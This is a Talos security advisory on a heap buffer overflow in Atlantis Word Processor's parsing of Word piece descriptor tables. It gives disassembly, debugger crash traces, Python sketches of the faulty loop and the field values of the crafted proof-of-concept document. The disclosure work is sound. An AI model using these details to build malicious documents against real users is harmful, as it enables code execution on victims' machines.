Talos Vulnerability Report

TALOS-2018-0646

Atlantis Word Processor Word Document Complex Piece Descriptor Table Fc.Compressed Code Execution Vulnerability

October 1, 2018

CVE Number

CVE-2018-3978

Summary

An exploitable out-of-bounds write vulnerability exists in the Word Document parser of the Atlantis Word Processor. A specially crafted document can cause Atlantis to write a value outside the bounds of a heap allocation, resulting in a buffer overflow. An attacker must convince a victim to open a document in order to trigger this vulnerability.

Tested Versions

Atlantis Word Processor 3.0.2.3, 3.0.2.5

Product URLs

https://www.atlantiswordprocessor.com/en/

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-122: Heap-based Buffer Overflow

Details

Atlantis Word Processor is a traditional word processor that markets itself as being portable and feature-heavy. This word processor is ideally suited for writers and students and provides a number of useful features that can help simplify, and even improve, one’s writing. Atlantis Word Processor is fully compatible with other word processors such as Microsoft Word 2007. Atlantis also has the capability to encrypt document files and to fully customize the interface. This application is written in Delphi and contains the majority of its capabilities within a single relocatable binary.

When Atlantis tries to parse a Microsoft Word binary document, the application will first fingerprint it to determine the correct file format. Once it discovers that the file is a compound document file, it will locate the “WordDocument” stream, check the stream’s signature, and then read the Fib out of its header. After storing a couple of fields out of the Fib, the application will then use a field from the Fib to determine which stream contains table information, which can be “1Table” or “0Table”. Once it has identified the correct table stream, the application will then read an offset to the Clx array and its size out of the Fib and use these to locate the Clx array. When parsing this array, the application will check if the elements in the array are pointing to compressed pieces/text. If an individual piece is compressed, the application will re-calculate the character position and write it back into the array. If the Clx array size (as stored in the Fib) is too small to hold every element that the array describes, this new character position will be written outside the bounds of the array, leading to a heap-based buffer overflow.

When first loading a document, the application will call the following function. This function takes a TDoc and the file format type as an index and is responsible for fingerprinting the file and then parsing it. First, at [1], the application will call the function 0x5ab474, which will read a filename from the function’s frame and then write a file handle into the TDoc variable at %ebp-0x18. After the handle is allocated, the application will read the file into a buffer and then execute the call at 0x5ad9aa to verify that the file matches the type that was specified. Once this has been verified to be a Word document (DOC), the application will then call the function at [2] in order to parse the file.

awp+0x1ad81d:
005ad81d 55              push    ebp
005ad81e e851dcffff      call    awp+0x1ab474 (005ab474)    // [1] Open up the file, and return the handle.
005ad823 59              pop     ecx
005ad824 84c0            test    al,al
005ad826 750d            jne     awp+0x1ad835 (005ad835)
...
awp+0x1ad8f2:
005ad8f2 55              push    ebp
005ad8f3 680fd95a00      push    offset awp+0x1ad90f (005ad90f)
005ad8f8 64ff30          push    dword ptr fs:[eax]
005ad8fb 648920          mov     dword ptr fs:[eax],esp
005ad8fe 55              push    ebp
005ad8ff e8d82cfdff      call    awp+0x1805dc (005805dc)    // Reads the file into a local buffer
005ad904 59              pop     ecx
...
awp+0x1ad9a4:
005ad9a4 55              push    ebp
005ad9a5 8b45f0          mov     eax,dword ptr [ebp-10h]    // Pointer to File Format Type index
005ad9a8 8bc3            mov     eax,ebx
005ad9aa e86d3afdff      call    awp+0x18141c (0058141c)    // Verify the file matches the format specified by %eax
005ad9af 59              pop     ecx
005ad9b0 84c0            test    al,al
005ad9b2 0f8592000000    jne     awp+0x1ada4a (005ada4a)
...
awp+0x1ade4d:
005ade4d 8b45e8          mov     eax,dword ptr [ebp-18h]                    // TDoc
005ade50 8b80dc000000    mov     eax,dword ptr [eax+0DCh]
005ade56 83f805          cmp     eax,5
005ade59 776a            ja      awp+0x1adec5 (005adec5)
005ade5b ff248562de5a00  jmp     dword ptr awp+0x1ade62 (005ade62)[eax*4]   // Jump to the correct file format parser
005ade62 7ade            jp      awp+0x1ade42 (005ade42)
...
awp+0x1ade89:
005ade89 55              push    ebp
005ade8a e8259dfeff      call    awp+0x197bb4 (00597bb4)                    // [2] Parse the .doc file
005ade8f 59              pop     ecx
005ade90 8885d7f8ffff    mov     byte ptr [ebp-729h],al
005ade96 eb3a            jmp     awp+0x1aded2 (005aded2)

To parse a DOC file, the application will execute the following function, which begins by working out how the file should be handled. First, the application will check the beginning of the “WordDocument” stream for a 16-bit signature 0xa5ec. Once that is determined, Atlantis can then read a flag from the Fib in the “WordDocument” stream’s header to locate which stream contains table data [3]. If this bit is set (1), then the table can be located in the “1Table” stream. If it is cleared (0), then the table will be located in the “0Table” stream. The correct stream is then opened by the call at [4] or [5]. Finally, the last stream that this function will open is the “Data” stream. This stream is opened at [6].

awp+0x197d0f:
00597d0f 0fb707          movzx   eax,word ptr [edi]
00597d12 3deca50000      cmp     eax,0A5ECh             // Check first word at beginning of WordDocument stream for signature
00597d17 0f9445f7        sete    byte ptr [ebp-9]
...
awp+0x197d4d:
00597d4d f6470b02        test    byte ptr [edi+0Bh],2   // [3] Check FibBase.b.fWhichTblStm to determine whether to use the "0Table" or "1Table" stream
00597d51 7531            jne     awp+0x197d84 (00597d84)
...
awp+0x197d53:
00597d53 8d45fc          lea     eax,[ebp-4]
00597d56 e819c7e6ff      call    awp+0x4474 (00404474)
00597d5b 50              push    eax
00597d5c 6a00            push    0
00597d5e 6a10            push    10h
00597d60 6a00            push    0
00597d62 a1080e6700      mov     eax,dword ptr [awp+0x270e08 (00670e08)]    // Reference to string "0Table"
00597d67 8b00            mov     eax,dword ptr [eax]
00597d69 50              push    eax
00597d6a 8b4508          mov     eax,dword ptr [ebp+8]
00597d6d 8b806cffffff    mov     eax,dword ptr [eax-94h]
00597d73 50              push    eax
00597d74 8b00            mov     eax,dword ptr [eax]
00597d76 ff5010          call    dword ptr [eax+10h]                        // [4] Uses IStorage->OpenStream to open the "0Table" stream
00597d79 85c0            test    eax,eax
00597d7b 7d36            jge     awp+0x197db3 (00597db3)
...
awp+0x197d84:
00597d84 8d45fc          lea     eax,[ebp-4]
00597d87 e8e8c6e6ff      call    awp+0x4474 (00404474)
00597d8c 50              push    eax
00597d8d 6a00            push    0
00597d8f 6a10            push    10h
00597d91 6a00            push    0
00597d93 a1a00b6700      mov     eax,dword ptr [awp+0x270ba0 (00670ba0)]    // Reference to string "1Table"
00597d98 8b00            mov     eax,dword ptr [eax]
00597d9a 50              push    eax
00597d9b 8b4508          mov     eax,dword ptr [ebp+8]
00597d9e 8b806cffffff    mov     eax,dword ptr [eax-94h]
00597da4 50              push    eax
00597da5 8b00            mov     eax,dword ptr [eax]
00597da7 ff5010          call    dword ptr [eax+10h]                        // [5] Uses IStorage->OpenStream to open the "1Table" stream
00597daa 85c0            test    eax,eax
00597dac 7d05            jge     awp+0x197db3 (00597db3)
...
awp+0x197db3:
00597db3 8d45f8          lea     eax,[ebp-8]
00597db6 e8b9c6e6ff      call    awp+0x4474 (00404474)
00597dbb 50              push    eax
00597dbc 6a00            push    0
00597dbe 6a10            push    10h
00597dc0 6a00            push    0
00597dc2 a174106700      mov     eax,dword ptr [awp+0x271074 (00671074)]    // Reference to string "Data"
00597dc7 8b00            mov     eax,dword ptr [eax]
00597dc9 50              push    eax
00597dca 8b4508          mov     eax,dword ptr [ebp+8]
00597dcd 8b806cffffff    mov     eax,dword ptr [eax-94h]
00597dd3 50              push    eax
00597dd4 8b00            mov     eax,dword ptr [eax]
00597dd6 ff5010          call    dword ptr [eax+10h]                        // [6] Uses IStorage->OpenStream to open the "Data" stream
00597dd9 eb22            jmp     awp+0x197dfd (00597dfd)

After opening up the required streams, Atlantis will begin to parse the required data out of them. At the call marked [6] in the following listing, the application will begin to parse various records such as the document properties table, PlcfBkl table (Bookmarks), etc. After parsing these, the application will take the sum of the various CCP fields that are listed. These fields are needed by parsers of the Word document to determine the location of the different sections of a document. Eventually, the application will execute the instruction at [7] and continue parsing more of the file format.

awp+0x197dfd:
00597dfd 55              push    ebp
00597dfe e83549ffff      call    awp+0x18c738 (0058c738)    // [6] Parse the Dop fields out of the table stream
00597e03 59              pop     ecx
...
// Various functions that read an FcLcb from the Fib structure of the WordDocument and reads them into a TMemory object
...
awp+0x197fbc:
00597fbc 55              push    ebp
00597fbd 8b574c          mov     edx,dword ptr [edi+4Ch]    // ccpText
00597fc0 035750          add     edx,dword ptr [edi+50h]    // ccpFtn
00597fc3 035754          add     edx,dword ptr [edi+54h]    // ccpHdd
00597fc6 035760          add     edx,dword ptr [edi+60h]    // ccpEdn
00597fc9 8b4734          mov     eax,dword ptr [edi+34h]
00597fcc 034738          add     eax,dword ptr [edi+38h]
00597fcf 03473c          add     eax,dword ptr [edi+3Ch]
00597fd2 034748          add     eax,dword ptr [edi+48h]
00597fd5 e84e47ffff      call    awp+0x18c728 (0058c728)    // Returns %edx depending on 0xa5ec signature or %eax otherwise
00597fda 59              pop     ecx
...
awp+0x198001:
00598001 55              push    ebp
00598002 e80df1ffff      call    awp+0x197114 (00597114)    // [7] Continue parsing the document

Once inside the following function (0x597114), Atlantis will store some of the individual CCP fields that were summed up earlier. These fields will be used to collect the different sections belonging to the document. After they are collected, they are used to process a number of different fields within the Fib. Eventually, the application will get to the instructions at [8]. These instructions will use the FcLcb structure belonging to the Clx field in the Fib to locate the Clx array in the table stream. At [9], the lcb field containing the size of the Clx array will be used in an allocation. This allocation will be the heap buffer that will be overflowed later. Immediately afterward, at [10], the application will read the Clx array into the buffer.

awp+0x197114:
00597114 55              push    ebp
00597115 8bec            mov     ebp,esp
00597117 50              push    eax
00597118 b806000000      mov     eax,6
0059711d 81c404f0ffff    add     esp,0FFFFF004h
...
// Store the individual sections of the document
...
// Process the different sections of the document.
...
awp+0x197623:
00597623 8b4508          mov     eax,dword ptr [ebp+8]      // [8]
00597626 50              push    eax
00597627 8b4508          mov     eax,dword ptr [ebp+8]
0059762a 8b4008          mov     eax,dword ptr [eax+8]
0059762d 8b900efbffff    mov     edx,dword ptr [eax-4F2h]   // Read the fib.fibRgFcLcbBlob.97.Clx.lcb field
00597633 8b4508          mov     eax,dword ptr [ebp+8]
00597636 8b4008          mov     eax,dword ptr [eax+8]
00597639 8b80ccfaffff    mov     eax,dword ptr [eax-534h]
0059763f e8e450ffff      call    awp+0x18c728 (0058c728)    // Returns %edx depending on 0xa5ec signature or %eax otherwise
00597644 59              pop     ecx
00597645 8985cc90ffff    mov     dword ptr [ebp-6F34h],eax  // Stores the size of the Clx table
0059764b 8b4508          mov     eax,dword ptr [ebp+8]
0059764e 50              push    eax
0059764f 8b4508          mov     eax,dword ptr [ebp+8]
00597652 50              push    eax
00597653 8b4508          mov     eax,dword ptr [ebp+8]
00597656 8b4008          mov     eax,dword ptr [eax+8]
00597659 8b900afbffff    mov     edx,dword ptr [eax-4F6h]   // Read the fib.fibRgFcLcbBlob.97.Clx.fc field
0059765f 8b4508          mov     eax,dword ptr [ebp+8]
00597662 8b4008          mov     eax,dword ptr [eax+8]
00597665 8b80c8faffff    mov     eax,dword ptr [eax-538h]
0059766b e8b850ffff      call    awp+0x18c728 (0058c728)    // Returns %edx depending on 0xa5ec signature or %eax otherwise
00597670 59              pop     ecx
00597671 e8a24fffff      call    awp+0x18c618 (0058c618)    // Seek to the offset specified by fib.fibRgFcLcbBlob.97.Clx.fc
00597676 59              pop     ecx
00597677 8b85cc90ffff    mov     eax,dword ptr [ebp-6F34h]  // Size of the Clx array
0059767d e8beace6ff      call    awp+0x2340 (00402340)      // [9] Use size to allocate memory
00597682 8985c890ffff    mov     dword ptr [ebp-6F38h],eax  // Pointer that will contain Clx array
00597688 8b4508          mov     eax,dword ptr [ebp+8]
0059768b 50              push    eax
0059768c 8b95cc90ffff    mov     edx,dword ptr [ebp-6F34h]  // Size
00597692 8b85c890ffff    mov     eax,dword ptr [ebp-6F38h]  // Pointer containing Clx array
00597698 e8af4fffff      call    awp+0x18c64c (0058c64c)    // [10] Read Clx array from the Table stream

After reading the CLX array, Atlantis will begin to parse it. To parse this array, the application will read the first byte and check to see if it is a 0x01 or a 0x02. If it’s a 0x01, it will process the array as an RgPrc array. If it’s 0x02, it will process it as a pcdt or a “piece descriptor” array. The vulnerability described in this advisory is related to how the application processes the piece descriptor array. Once determining that the CLX is pointing to a piece descriptor array, the application will pre-calculate some pointers into the data that need to be parsed. This will then be processed by a loop that will iterate for each element in the array.

awp+0x1976e5:
005976e5 8bbdc890ffff    mov     edi,dword ptr [ebp-6F38h]      // Clx array data from file
005976eb 03f9            add     edi,ecx
005976ed 47              inc     edi                            // Skip the Clx.pcdt.clxt byte so that %edi points to Clx.pcdt.lcb
005976ee 8b07            mov     eax,dword ptr [edi]            // Read the lcb field at the beginning of the Clx.pcdt structure
005976f0 83e804          sub     eax,4                          // Remove the size of the Clx.pcdt.lcb field
005976f3 51              push    ecx
005976f4 b90c000000      mov     ecx,0Ch                        // sizeof(CP) + sizeof(PLC)
005976f9 99              cdq
005976fa f7f9            idiv    eax,ecx
005976fc 59              pop     ecx
005976fd 83c704          add     edi,4
00597700 89bdc490ffff    mov     dword ptr [ebp-6F3Ch],edi
00597706 8d5001          lea     edx,[eax+1]                    // Number of elements in the Clx.pcdt.PlcPcd.aCP array
00597709 c1e202          shl     edx,2
0059770c 0395c490ffff    add     edx,dword ptr [ebp-6F3Ch]      // Clx.Pcdt.PlcPcd file offset used to calculate pointer to Clx.pcdt.PlcPcd.aPcd
00597712 8995c090ffff    mov     dword ptr [ebp-6F40h],edx      // Write the pointer to Clx.pcdt.PlcPcd.aPcd for use later
00597718 48              dec     eax
00597719 85c0            test    eax,eax
0059771b 0f8ca8010000    jl      awp+0x1978c9 (005978c9)
...
awp+0x197721:
00597721 40              inc     eax
00597722 89859c90ffff    mov     dword ptr [ebp-6F64h],eax      // aCP counter used to terminate following loop
00597728 c785b890ffff00000000 mov dword ptr [ebp-6F48h],0       // aCP index used to maintain position in following loop
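
The arithmetic performed by this listing can be sketched in Python as follows. This is only an illustration of the instructions shown above, not code taken from Atlantis; the function name plcpcd_layout and the constant names are hypothetical.

```python
CP_SIZE = 4    # sizeof(CP), a uint32_t character position
PCD_SIZE = 8   # sizeof(Pcd)

def plcpcd_layout(pcdt_lcb):
    """Return (piece count, offset of aPcd relative to the start of PlcPcd)."""
    # Mirrors `sub eax,4` and `idiv ecx` with ecx = 0x0C. Python floor division
    # only matches idiv for non-negative inputs, which is all this sketch covers.
    piece_count = (pcdt_lcb - CP_SIZE) // (CP_SIZE + PCD_SIZE)
    # Mirrors `lea edx,[eax+1]` and `shl edx,2`: aCP holds piece_count + 1 entries.
    apcd_offset = (piece_count + 1) * CP_SIZE
    return piece_count, apcd_offset

piece_count, apcd_offset = plcpcd_layout(0x34)
print(piece_count, hex(apcd_offset))  # 4 0x14
```

With the Pcdt.lcb value of 0x34 from the proof of concept, this yields four piece descriptors that start 0x14 bytes into the PlcPcd, which agrees with the aPcd offset (0x78b - 0x777) shown in the structure dumps later in this advisory.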

After determining how to parse the piece descriptor table, the application will execute the following loop. Each iteration of this loop will read one piece descriptor and determine whether the piece is described as compressed or not. This result will eventually be handed off to the function call at [11]. However, due to the way the application handles a compressed piece, the application may corrupt the memory that was allocated for the Clx array. At [12], the application will check to see if the Pcd.fCompressed field is set. If this field is set, then execution will continue at [13]. At this point the application will extract the Fc offset from the piece descriptor, divide it by two, and then write it back into the array at [14]. Because the array was allocated and initialized using the Clx.lcb field from the Fib, while the loop count is derived from the lcb field stored inside the array itself, the write at [14] during the last iteration may land past the end of the allocation and corrupt the data that follows it. At [15], the pointer will then be freed. Due to the way the Delphi heap allocator works, this will result in an “unlink” that can be used to further corrupt memory.

awp+0x197732:
00597732 8bbdb890ffff    mov     edi,dword ptr [ebp-6F48h]      // Read current aCP index
00597738 c1e703          shl     edi,3
0059773b 03bdc090ffff    add     edi,dword ptr [ebp-6F40h]      // Add it to Clx.pcdt.PlcPcd.aPcd pointer
00597741 8b4702          mov     eax,dword ptr [edi+2]          // Read the Pcd.fc field out of the Clx.pcdt.PlcPcd.aPcd index
00597744 a900000040      test    eax,40000000h                  // [12] Check to see if the Pcd.fCompressed field is set
00597749 7413            je      awp+0x19775e (0059775e)
0059774b 25ffffffbf      and     eax,0BFFFFFFFh                 // [13] Extract the Pcd.fc offset from the Pcd
00597750 d1e8            shr     eax,1                          // Divide the offset by 2
00597752 894702          mov     dword ptr [edi+2],eax          // [14] Write the offset back into the array
00597755 c685bf90ffff01  mov     byte ptr [ebp-6F41h],1         // Set a flag specifying that the piece is compressed
0059775c eb19            jmp     awp+0x197777 (00597777)
...
awp+0x197899:
00597899 8b85b090ffff    mov     eax,dword ptr [ebp-6F50h]      // aCP end
0059789f 2b85b490ffff    sub     eax,dword ptr [ebp-6F4Ch]      // aCP start
005978a5 0fafc8          imul    ecx,eax                        // %ecx = 1 if fc.fCompressed is false (ascii), 2 if fc.fCompressed is true (unicode)
005978a8 8b5702          mov     edx,dword ptr [edi+2]          // Points to Clx.Pcdt.PlcPcd.aPcd
005978ab 8b85b490ffff    mov     eax,dword ptr [ebp-6F4Ch]      // aCP start
005978b1 e89ee4ffff      call    awp+0x195d54 (00595d54)        // [11] Parse piece using descriptor
005978b6 59              pop     ecx
005978b7 ff85b890ffff    inc     dword ptr [ebp-6F48h]          // aCP index
005978bd ff8d9c90ffff    dec     dword ptr [ebp-6F64h]          // aCP counter
005978c3 0f8569feffff    jne     awp+0x197732 (00597732)
...
005978c9 8b85c890ffff    mov     eax,dword ptr [ebp-6F38h]      // Clx array that was corrupted
005978cf e8eca6e6ff      call    awp+0x1fc0 (00401fc0)          // [15] Free the Clx array that was allocated
005978d4 eb5e            jmp     awp+0x197934 (00597934)

In the provided proof-of-concept, the Fib.Clx field is set to the following values. Because the lcb field is set to a size of 0x31, which is not a multiple of the size of a piece descriptor (8), the loop described in the prior code will read a uint32 from past the end of the Clx array, divide it by two, and then write it back to the same location. Since this uint32 lies outside of the Clx array, the write will corrupt any memory that is positioned after it.

<class winword.FcLcb> 'Clx'
[1a2] <instance pint.uint32_t 'fc'> 0x00000772 (1906)
[1a6] <instance pint.uint32_t 'lcb'> 0x00000031 (49)
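
As a rough illustration of the loop applied to these values, the following Python sketch replays the fc rewrite over the proof of concept's Clx bytes (reassembled from the structure dumps in this advisory) and reports which writes fit inside a 0x31-byte allocation. The name simulate_piece_loop and the constants are hypothetical. The real process only reads 0x31 bytes from the file and then operates on whatever heap data follows the buffer, whereas this sketch uses the bytes present in the file.

```python
import struct

F_COMPRESSED = 0x40000000   # Pcd.fc.fCompressed

# Clx bytes reassembled from the dumps in this advisory: clxt, Pcdt.lcb, aCP[5], aPcd[4].
POC_CLX = (
    b"\x02"
    + struct.pack("<I", 0x34)
    + struct.pack("<5I", 0x0000, 0x0C00, 0x0E00, 0x13A7, 0x1440)
    + bytes.fromhex("4000001000400000" "4000001400000000"
                    "4000003000400000" "0000005800400000")
)

def simulate_piece_loop(clx, alloc_size):
    """Replay the fc rewrite; return (piece index, write offset, fits in allocation)."""
    buf = bytearray(clx)
    (pcdt_lcb,) = struct.unpack_from("<I", buf, 1)   # skip the clxt byte
    count = (pcdt_lcb - 4) // 12                     # number of Pcd elements
    apcd = 1 + 4 + (count + 1) * 4                   # offset of aPcd inside the buffer
    writes = []
    for i in range(count):
        fc_off = apcd + i * 8 + 2                    # Pcd.fc sits two bytes into the Pcd
        (fc,) = struct.unpack_from("<I", buf, fc_off)
        if fc & F_COMPRESSED:
            struct.pack_into("<I", buf, fc_off, (fc & 0xBFFFFFFF) >> 1)
            writes.append((i, fc_off, fc_off + 4 <= alloc_size))
    return writes

print(len(POC_CLX))                        # 57
print(simulate_piece_loop(POC_CLX, 0x31))  # [(0, 27, True), (2, 43, True), (3, 51, False)]
```

Under these assumptions the Clx needs 57 (0x39) bytes, while only 0x31 were allocated, so the fc field of the last piece descriptor starts at offset 51 and lies beyond the allocation.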

Crash Information

Execute until the CLX array gets allocated. The CLX array is allocated with 0x31 bytes.

0:006> g awp+19767d
eax=00000031 ebx=00000005 ecx=0018f004 edx=0dc60500 esi=0066e894 edi=00000488
eip=0059767d esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
awp+0x19767d:
0059767d e8beace6ff      call    awp+0x2340 (00402340)

0:000> r @eax
eax=00000031

The buffer allocated for the CLX array was returned in %eax.

0:000> p
eax=0b7f92f8 ebx=00000005 ecx=0b7f92f8 edx=0018ecd4 esi=0066e894 edi=00000488
eip=00597682 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
awp+0x197682:
00597682 8985c890ffff    mov     dword ptr [ebp-6F38h],eax ss:002b:00187d90=00000000

0:000> r @eax
eax=0b7f92f8

0:000> r@$t1=@eax

Check each iteration of the loop to identify the iteration that writes past the CLX array.

0:000> bp awp+197752
0:000> g

Create thread 9:930
Breakpoint 0 hit
eax=00000800 ebx=00000005 ecx=00000000 edx=0b7f9311 esi=0066e894 edi=0b7f9311
eip=00597752 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
awp+0x197752:
00597752 894702          mov     dword ptr [edi+2],eax ds:002b:0b7f9313=40001000

0:000> ? @edi-@$t1
Evaluate expression: 25 = 00000019
0:000> g

Breakpoint 0 hit
eax=00001800 ebx=00000005 ecx=0018ecc8 edx=00000000 esi=0066e894 edi=0b7f9321
eip=00597752 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
awp+0x197752:
00597752 894702          mov     dword ptr [edi+2],eax ds:002b:0b7f9323=40003000

0:000> ? @edi-@$t1
Evaluate expression: 41 = 00000029
0:000> g

Breakpoint 0 hit
eax=13904805 ebx=00000005 ecx=0018ecc8 edx=00000000 esi=0066e894 edi=0b7f9329
eip=00597752 esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000207
awp+0x197752:
00597752 894702          mov     dword ptr [edi+2],eax ds:002b:0b7f932b=6720900b

0:000> ? @edi-@$t1
Evaluate expression: 49 = 00000031
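
The register values from the three breakpoint hits above can be cross-checked with a few lines of Python. This is a sketch over the numbers printed by the debugger; the names rewrite_fc, HITS, and check_hits are hypothetical.

```python
ALLOC_BASE = 0x0B7F92F8   # %eax returned by the allocation at [9]
ALLOC_SIZE = 0x31         # Clx.lcb

def rewrite_fc(fc):
    """Mirror `and eax,0BFFFFFFFh` followed by `shr eax,1`."""
    return (fc & 0xBFFFFFFF) >> 1

# (edi, dword at [edi+2] before the write, eax about to be written)
HITS = [
    (0x0B7F9311, 0x40001000, 0x00000800),
    (0x0B7F9321, 0x40003000, 0x00001800),
    (0x0B7F9329, 0x6720900B, 0x13904805),
]

def check_hits(hits):
    """Return (write offset, eax matches the rewrite, write fits in allocation)."""
    results = []
    for edi, before, eax in hits:
        offset = edi + 2 - ALLOC_BASE
        results.append((offset, rewrite_fc(before) == eax, offset + 4 <= ALLOC_SIZE))
    return results

for offset, value_ok, in_bounds in check_hits(HITS):
    print(hex(offset), value_ok, in_bounds)
```

The first two writes land at offsets 0x1b and 0x2b inside the 0x31-byte buffer. The third lands at offset 0x33, and the value it rewrites (0x6720900b) is not the 0x40005800 stored in the file for the last piece descriptor, which is consistent with the read and the write both touching memory past the end of the allocation.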

The last iteration of the loop has written outside the bounds of the CLX array. Continue execution until it gets freed.

0:000> g awp+1978cf

eax=0b7f92f8 ebx=00000005 ecx=0018ecc8 edx=00000000 esi=0066e894 edi=0b7f9329
eip=005978cf esp=00187d58 ebp=0018ecc8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
awp+0x1978cf:
005978cf e8eca6e6ff      call    awp+0x1fc0 (00401fc0)

Step over the free which uses the corrupted memory.

0:000> p

(bec.bf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00139048 ebx=00001040 ecx=00001008 edx=0bb6449c esi=0b7f92f4 edi=0b7f932c
eip=00401a02 esp=00187d30 ebp=00187d50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
awp+0x1a02:
00401a02 895004          mov     dword ptr [eax+4],edx ds:002b:0013904c=????????

Exploit proof of concept

The provided proof of concept is encompassed within a Microsoft Word document that uses Microsoft’s Compound File Binary format. Documentation for this can be found at https://msdn.microsoft.com/en-us/library/dd942138.aspx and its respective file format at https://msdn.microsoft.com/en-us/library/office/cc313153(v=office.12).aspx.

A Microsoft Word compound document contains a number of streams. The ones that are utilized by this vulnerability are the “WordDocument” stream and the “Table” stream. The “WordDocument” stream contains the table of contents for the rest of the file using a structure referred to as the Fib or the “File Information Block”. The table stream can have one of two names. These are “0Table” and “1Table”. The specific stream name can be identified by a flag which is located in the Fib that is stored at the beginning of the “WordDocument” stream.

In the “WordDocument” stream within the provided proof of concept, the Fib has the following structure. The application verifies that a file is valid by checking a couple of fields in the Fib.base structure, even though this vulnerability only depends on a small number of fields. In this structure, the fields csw, cslw, and cbRgFcLcb contain the number of elements of the arrays that follow them. The fibRgW field is composed of uint16_t, the fibRgLw field is composed of uint32_t, and the fibRgFcLcbBlob field is composed of uint64_t.

<class winword.Fib> 'fib'
[0] <instance winword.FibBase 'base'> "\xec\xa5\x31\xe8\x09\x40\x09\x04\x00\x00\xf8\x12\xbf\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x99\x2c\x00\x00"
[20] <instance pint.uint16_t 'csw'> 0x000e (14)
[22] <instance winword.FibRgW 'fibRgW'> pint.uint16_t[14] "\x62\x6a\x62\x6a\x7b\xce\x7b\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x0c"
[3e] <instance pint.uint16_t 'cslw'> 0x0016 (22)
[40] <instance winword.FibRgLw 'fibRgLw'> pint.uint32_t[22] "\x2e\x2e\x00\x00\x19\xa4\x00  ..skipped ~68 bytes.. \x00\x00\x00\x00\x00\x00\x00"
[98] <instance pint.uint16_t 'cbRgFcLcb'> 0x0088 (136)
[9a] <instance winword.FibRgFcLcb 'fibRgFcLcbBlob'> pint.uint64_t[136] "\x00\x00\x00\x00\xc4\x01\x00   ..skipped ~1068 bytes..  \x00\x00\x00\x00\x00\x00"
[4da] <instance pint.uint16_t 'cswNew'> 0x0002 (2)
[4dc] <instance pint.uint16_t 'nFibNew'> 0x0101 (257)
[4de] <instance winword.FibRgCswNew 'fibRgCswNew'> pint.uint16_t[1] "\x00\x00"

The Fib.base structure has the following format. Atlantis verifies that the wIdent field is set to 0xa5ec, and that the value for nFib is larger than 0x0065. The table stream is chosen by the Fib.base.b.fWhichTblStm (0x0200) flag. If this flag is set, then “1Table” is chosen, otherwise “0Table” is chosen. Atlantis also requires that Fib.base.b.fComplex (0x0004), Fib.base.b.fEncrypted (0x0100), and Fib.base.b.fObfuscated (0x8000) are cleared.

<class winword.FibBase> 'base'
[0] <instance pint.uint16_t 'wIdent'> 0xa5ec (42476)                                            // XXX
[2] <instance pint.uint16_t 'nFib'> 0xe831 (59441)                                              // XXX: Must be >= 0x0065
[4] <instance pint.uint16_t 'unused'> 0x4009 (16393)
[6] <instance winword.LID 'lid'> en-US(0x409)
[8] <instance pint.uint16_t 'pnNext'> 0x0000 (0)
[a] <instance winword._b 'b'> (0x12f8,16) : fExtChar fWhichTblStm cQuickSaves=15 fHasPic        // XXX
[c] <instance pint.uint16_t 'nFibBack'> 0x00bf (191)
[e] <instance pint.uint32_t 'lKey'> 0x00000000 (0)
[12] <instance pint.uint8_t 'envr'> 0x00 (0)
[13] <instance winword._b2 'b2'> (0x10,8) : reserved2
[14] <instance pint.uint16_t 'reserved3'> 0x0000 (0)
[16] <instance pint.uint16_t 'reserved4'> 0x0000 (0)
[18] <instance pint.uint32_t 'reserved5'> 0x00000600 (1536)
[1c] <instance pint.uint32_t 'reserved6'> 0x00002c99 (11417)
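
The checks described for Fib.base can be sketched in Python against the 32 bytes of the base structure shown earlier. This is a minimal illustration, not Atlantis' actual logic; the function name pick_table_stream is hypothetical, and the nFib comparison follows the ">=" annotation in the dump above, which is an assumption since the exact comparison is not shown in the disassembly.

```python
import struct

# Fib.base bytes from the proof of concept, as listed in the Fib dump.
FIB_BASE = bytes.fromhex(
    "eca531e809400904" "0000f812bf000000"
    "0000001000000000" "00060000992c0000"
)

F_COMPLEX      = 0x0004
F_ENCRYPTED    = 0x0100
F_WHICH_TBLSTM = 0x0200
F_OBFUSCATED   = 0x8000

def pick_table_stream(fib_base):
    """Validate the fields described above and return the table stream name."""
    w_ident, n_fib = struct.unpack_from("<HH", fib_base, 0x00)
    (flags,) = struct.unpack_from("<H", fib_base, 0x0A)
    if w_ident != 0xA5EC:
        raise ValueError("unexpected wIdent")
    if n_fib < 0x0065:          # assumption: comparison taken from the dump annotation
        raise ValueError("nFib too small")
    if flags & (F_COMPLEX | F_ENCRYPTED | F_OBFUSCATED):
        raise ValueError("fComplex, fEncrypted, or fObfuscated is set")
    return "1Table" if flags & F_WHICH_TBLSTM else "0Table"

print(pick_table_stream(FIB_BASE))  # 1Table
```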

The following fields are inside the Fib.fibRgLw array. These fields are used by the piece descriptor table to determine when the aCP array terminates and the aPcd array begins. Normally, the ccpText field (index 3) can be used to determine the limits of the maximum value for aCP. However, if any of the ccpFtn (index 4), ccpHdr (index 5), ccpMcr (index 6), ccpAtn (index 7), ccpEdn (index 8), or ccpTxbx (index 9) fields are set, then the maximum value for aCP is based on the sum of these numbers.

<class winword.FibRgLw95> '95'
[40] <instance pint.uint32_t 'cbMac'> 0x00002e2e (11822)
[44] <instance pint.uint32_t 'lProductCreated'> 0x0000a419 (42009)
